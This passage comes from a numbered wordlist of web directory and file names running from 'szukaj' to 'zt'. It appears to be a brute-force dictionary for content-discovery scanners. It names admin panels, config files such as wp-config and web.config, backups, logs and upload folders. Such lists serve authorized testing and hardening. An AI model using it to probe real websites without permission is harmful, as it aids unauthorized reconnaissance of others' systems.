szukaj 3954 | t 3955 | T 3956 | t1 3957 | t3lib 3958 | table 3959 | tabs 3960 | tag 3961 | tagline 3962 | tags 3963 | tail 3964 | talk 3965 | talks 3966 | tape 3967 | tapes 3968 | tapestry 3969 | tar 3970 | tar.bz2 3971 | tar.gz 3972 | target 3973 | tartarus 3974 | task 3975 | tasks 3976 | taxonomy 3977 | tb 3978 | tcl 3979 | te 3980 | team 3981 | tech 3982 | technical 3983 | technology 3984 | Technology 3985 | tel 3986 | tele 3987 | television 3988 | tell_a_friend 3989 | tell_friend 3990 | tellafriend 3991 | temaoversikt 3992 | temp 3993 | TEMP 3994 | templ 3995 | template 3996 | templates 3997 | templates_c 3998 | templets 3999 | temporal 4000 | temporary 4001 | temps 4002 | term 4003 | terminal 4004 | terms 4005 | terms_privacy 4006 | termsofuse 4007 | terms-of-use 4008 | terrorism 4009 | test 4010 | test_db 4011 | test1 4012 | test123 4013 | test1234 4014 | test2 4015 | test3 4016 | test-cgi 4017 | teste 4018 | test-env 4019 | testimonial 4020 | testimonials 4021 | testing 4022 | tests 4023 | testsite 4024 | texis 4025 | text 4026 | text-base 4027 | textobject 4028 | textpattern 4029 | texts 4030 | tgp 4031 | tgz 4032 | th 4033 | thanks 4034 | thankyou 4035 | thank-you 4036 | the 4037 | theme 4038 | themes 4039 | Themes 4040 | thickbox 4041 | third-party 4042 | this 4043 | thread 4044 | threadrate 4045 | threads 4046 | threadtag 4047 | thumb 4048 | thumbnail 4049 | thumbnails 4050 | thumbs 4051 | thumbs.db 4052 | Thumbs.db 4053 | ticket 4054 | ticket_list 4055 | ticket_new 4056 | tickets 4057 | tienda 4058 | tiki 4059 | tiles 4060 | time 4061 | timeline 4062 | tiny_mce 4063 | tinymce 4064 | tip 4065 | tips 4066 | title 4067 | titles 4068 | tl 4069 | tls 4070 | tmp 4071 | TMP 4072 | tmpl 4073 | tmps 4074 | tn 4075 | tncms 4076 | to 4077 | toc 4078 | today 4079 | todel 4080 | todo 4081 | TODO 4082 | toggle 4083 | tomcat 4084 | tomcat-docs 4085 | tool 4086 | toolbar 4087 | toolkit 4088 | tools 4089 | tooltip 4090 | top 4091 | top1 4092 | topic 4093 | topicadmin 4094 | topics 4095 | toplist 4096 | toplists 4097 | topnav 4098 | topsites 4099 | torrent 4100 | torrents 4101 | tos 4102 | tour 4103 | tours 4104 | toys 4105 | tp 4106 | tpl 4107 | tpv 4108 | tr 4109 | trac 4110 | trace 4111 | traceroute 4112 | traces 4113 | track 4114 | trackback 4115 | trackclick 4116 | tracker 4117 | trackers 4118 | tracking 4119 | trackpackage 4120 | tracks 4121 | trade 4122 | trademarks 4123 | traffic 4124 | trailer 4125 | trailers 4126 | training 4127 | trans 4128 | transaction 4129 | transactions 4130 | transfer 4131 | transformations 4132 | translate 4133 | translations 4134 | transparent 4135 | transport 4136 | trap 4137 | trash 4138 | travel 4139 | Travel 4140 | treasury 4141 | tree 4142 | trees 4143 | trends 4144 | trial 4145 | true 4146 | trunk 4147 | tslib 4148 | tsweb 4149 | tt 4150 | tuning 4151 | turbine 4152 | tuscany 4153 | tutorial 4154 | tutorials 4155 | tv 4156 | tw 4157 | twatch 4158 | tweak 4159 | twiki 4160 | twitter 4161 | tx 4162 | txt 4163 | type 4164 | typo3 4165 | typo3_src 4166 | typo3conf 4167 | typo3temp 4168 | typolight 4169 | u 4170 | U 4171 | ua 4172 | ubb 4173 | uc 4174 | uc_client 4175 | uc_server 4176 | ucenter 4177 | ucp 4178 | uddi 4179 | uds 4180 | ui 4181 | uk 4182 | umbraco 4183 | umbraco_client 4184 | umts 4185 | uncategorized 4186 | under_update 4187 | uninstall 4188 | union 4189 | unix 4190 | unlock 4191 | unpaid 4192 | unreg 4193 | unregister 4194 | unsafe 4195 | unsubscribe 4196 | unused 4197 | up 4198 | upcoming 4199 | upd 4200 | update 4201 | updated 4202 | updateinstaller 4203 | updater 4204 | updates 4205 | updates-topic 4206 | upgrade 4207 | upgrade.readme 4208 | upload 4209 | upload_file 4210 | upload_files 4211 | uploaded 4212 | uploadedfiles 4213 | uploadedimages 4214 | uploader 4215 | uploadfile 4216 | uploadfiles 4217 | uploads 4218 | ur-admin 4219 | urchin 4220 | url 4221 | urlrewriter 4222 | urls 4223 | us 4224 | US 4225 | usa 4226 | usage 4227 | user 4228 | user_upload 4229 | useradmin 4230 | userapp 4231 | usercontrols 4232 | usercp 4233 | usercp2 4234 | userdir 4235 | userfiles 4236 | UserFiles 4237 | userimages 4238 | userinfo 4239 | userlist 4240 | userlog 4241 | userlogin 4242 | usermanager 4243 | username 4244 | usernames 4245 | usernote 4246 | users 4247 | usr 4248 | usrmgr 4249 | usrs 4250 | ustats 4251 | usuario 4252 | usuarios 4253 | util 4254 | utilities 4255 | Utilities 4256 | utility 4257 | utility_login 4258 | utils 4259 | v 4260 | V 4261 | v1 4262 | v2 4263 | v3 4264 | v4 4265 | vadmind 4266 | validation 4267 | validatior 4268 | vap 4269 | var 4270 | vault 4271 | vb 4272 | vbmodcp 4273 | vbs 4274 | vbscript 4275 | vbscripts 4276 | vbseo 4277 | vbseocp 4278 | vcss 4279 | vdsbackup 4280 | vector 4281 | vehicle 4282 | vehiclemakeoffer 4283 | vehiclequote 4284 | vehicletestdrive 4285 | velocity 4286 | venda 4287 | vendor 4288 | vendors 4289 | ver 4290 | ver1 4291 | ver2 4292 | version 4293 | verwaltung 4294 | vfs 4295 | vi 4296 | viagra 4297 | vid 4298 | video 4299 | Video 4300 | videos 4301 | view 4302 | view_cart 4303 | viewcart 4304 | viewcvs 4305 | viewer 4306 | viewfile 4307 | viewforum 4308 | viewlogin 4309 | viewonline 4310 | views 4311 | viewsource 4312 | view-source 4313 | viewsvn 4314 | viewthread 4315 | viewtopic 4316 | viewvc 4317 | vip 4318 | virtual 4319 | virus 4320 | visit 4321 | visitor 4322 | visitormessage 4323 | vista 4324 | vm 4325 | vmailadmin 4326 | void 4327 | voip 4328 | vol 4329 | volunteer 4330 | vote 4331 | voted 4332 | voter 4333 | votes 4334 | vp 4335 | vpg 4336 | vpn 4337 | vs 4338 | vsadmin 4339 | vuln 4340 | vvc_display 4341 | w 4342 | W 4343 | w3 4344 | w3c 4345 | w3svc 4346 | W3SVC 4347 | W3SVC1 4348 | W3SVC2 4349 | W3SVC3 4350 | wa 4351 | wallpaper 4352 | wallpapers 4353 | wap 4354 | war 4355 | warenkorb 4356 | warez 4357 | warn 4358 | way-board 4359 | wbboard 4360 | wbsadmin 4361 | wc 4362 | wcs 4363 | wdav 4364 | weather 4365 | web 4366 | web.config 4367 | web.xml 4368 | web_users 4369 | web1 4370 | web2 4371 | web3 4372 | webaccess 4373 | webadm 4374 | webadmin 4375 | WebAdmin 4376 | webagent 4377 | webalizer 4378 | webapp 4379 | webapps 4380 | webb 4381 | webbbs 4382 | web-beans 4383 | webboard 4384 | webcalendar 4385 | webcam 4386 | webcart 4387 | webcast 4388 | webcasts 4389 | webcgi 4390 | webcharts 4391 | webchat 4392 | web-console 4393 | webctrl_client 4394 | webdata 4395 | webdav 4396 | webdb 4397 | webdist 4398 | webedit 4399 | webfm_send 4400 | webhits 4401 | webim 4402 | webinar 4403 | web-inf 4404 | WEB-INF 4405 | weblog 4406 | weblogic 4407 | weblogs 4408 | webmail 4409 | webmaster 4410 | webmasters 4411 | webpages 4412 | webplus 4413 | webresource 4414 | websearch 4415 | webservice 4416 | webservices 4417 | webshop 4418 | website 4419 | websites 4420 | websphere 4421 | websql 4422 | webstat 4423 | webstats 4424 | websvn 4425 | webtrends 4426 | webusers 4427 | webvpn 4428 | webwork 4429 | wedding 4430 | week 4431 | weekly 4432 | welcome 4433 | well 4434 | wellcome 4435 | werbung 4436 | wget 4437 | what 4438 | whatever 4439 | whatnot 4440 | whatsnew 4441 | white 4442 | whitepaper 4443 | whitepapers 4444 | who 4445 | whois 4446 | wholesale 4447 | whosonline 4448 | why 4449 | wicket 4450 | wide_search 4451 | widget 4452 | widgets 4453 | wifi 4454 | wii 4455 | wiki 4456 | will 4457 | win 4458 | win32 4459 | windows 4460 | Windows 4461 | wink 4462 | winnt 4463 | wireless 4464 | wishlist 4465 | with 4466 | wiz 4467 | wizard 4468 | wizmysqladmin 4469 | wml 4470 | wolthuis 4471 | word 4472 | wordpress 4473 | work 4474 | workarea 4475 | workflowtasks 4476 | working 4477 | workplace 4478 | works 4479 | workshop 4480 | workshops 4481 | world 4482 | worldpayreturn 4483 | worldwide 4484 | wow 4485 | wp 4486 | wp-admin 4487 | wp-app 4488 | wp-atom 4489 | wpau-backup 4490 | wp-blog-header 4491 | wpcallback 4492 | wp-comments 4493 | wp-commentsrss2 4494 | wp-config 4495 | wpcontent 4496 | wp-content 4497 | wp-cron 4498 | wp-dbmanager 4499 | wp-feed 4500 | wp-icludes 4501 | wp-images 4502 | wp-includes 4503 | wp-links-opml 4504 | wp-load 4505 | wp-login 4506 | wp-mail 4507 | wp-pass 4508 | wp-rdf 4509 | wp-register 4510 | wp-rss 4511 | wp-rss2 4512 | wps 4513 | wp-settings 4514 | wp-signup 4515 | wp-syntax 4516 | wp-trackback 4517 | wrap 4518 | writing 4519 | ws 4520 | ws_ftp 4521 | WS_FTP 4522 | WS_FTP.LOG 4523 | ws-client 4524 | wsdl 4525 | wss 4526 | wstat 4527 | wstats 4528 | wt 4529 | wtai 4530 | wusage 4531 | wwhelp 4532 | www 4533 | www1 4534 | www2 4535 | www3 4536 | wwwboard 4537 | wwwjoin 4538 | wwwlog 4539 | wwwroot 4540 | www-sql 4541 | wwwstat 4542 | wwwstats 4543 | wwwthreads 4544 | wwwuser 4545 | wysiwyg 4546 | wysiwygpro 4547 | x 4548 | X 4549 | xajax 4550 | xajax_js 4551 | xalan 4552 | xbox 4553 | xcache 4554 | xcart 4555 | xd_receiver 4556 | xdb 4557 | xerces 4558 | xfer 4559 | xhtml 4560 | xlogin 4561 | xls 4562 | xmas 4563 | xml 4564 | XML 4565 | xmlfiles 4566 | xmlimporter 4567 | xmlrpc 4568 | xml-rpc 4569 | xmlrpc.php 4570 | xmlrpc_server 4571 | xmlrpc_server.php 4572 | xn 4573 | xsl 4574 | xslt 4575 | xsql 4576 | xx 4577 | xxx 4578 | XXX 4579 | xyz 4580 | xyzzy 4581 | y 4582 | yahoo 4583 | year 4584 | yearly 4585 | yesterday 4586 | yml 4587 | yonetici 4588 | yonetim 4589 | youtube 4590 | yshop 4591 | yt 4592 | yui 4593 | z 4594 | zap 4595 | zboard 4596 | zencart 4597 | zend 4598 | zero 4599 | zeus 4600 | zh 4601 | zh_CN 4602 | zh_TW 4603 | zh-cn 4604 | zh-tw 4605 | zimbra 4606 | zip 4607 | zipfiles 4608 | zips 4609 | zoeken 4610 | zone 4611 | zones 4612 | zoom 4613 | zope 4614 | zorum 4615 | zt --------------------------------------------------------------------------------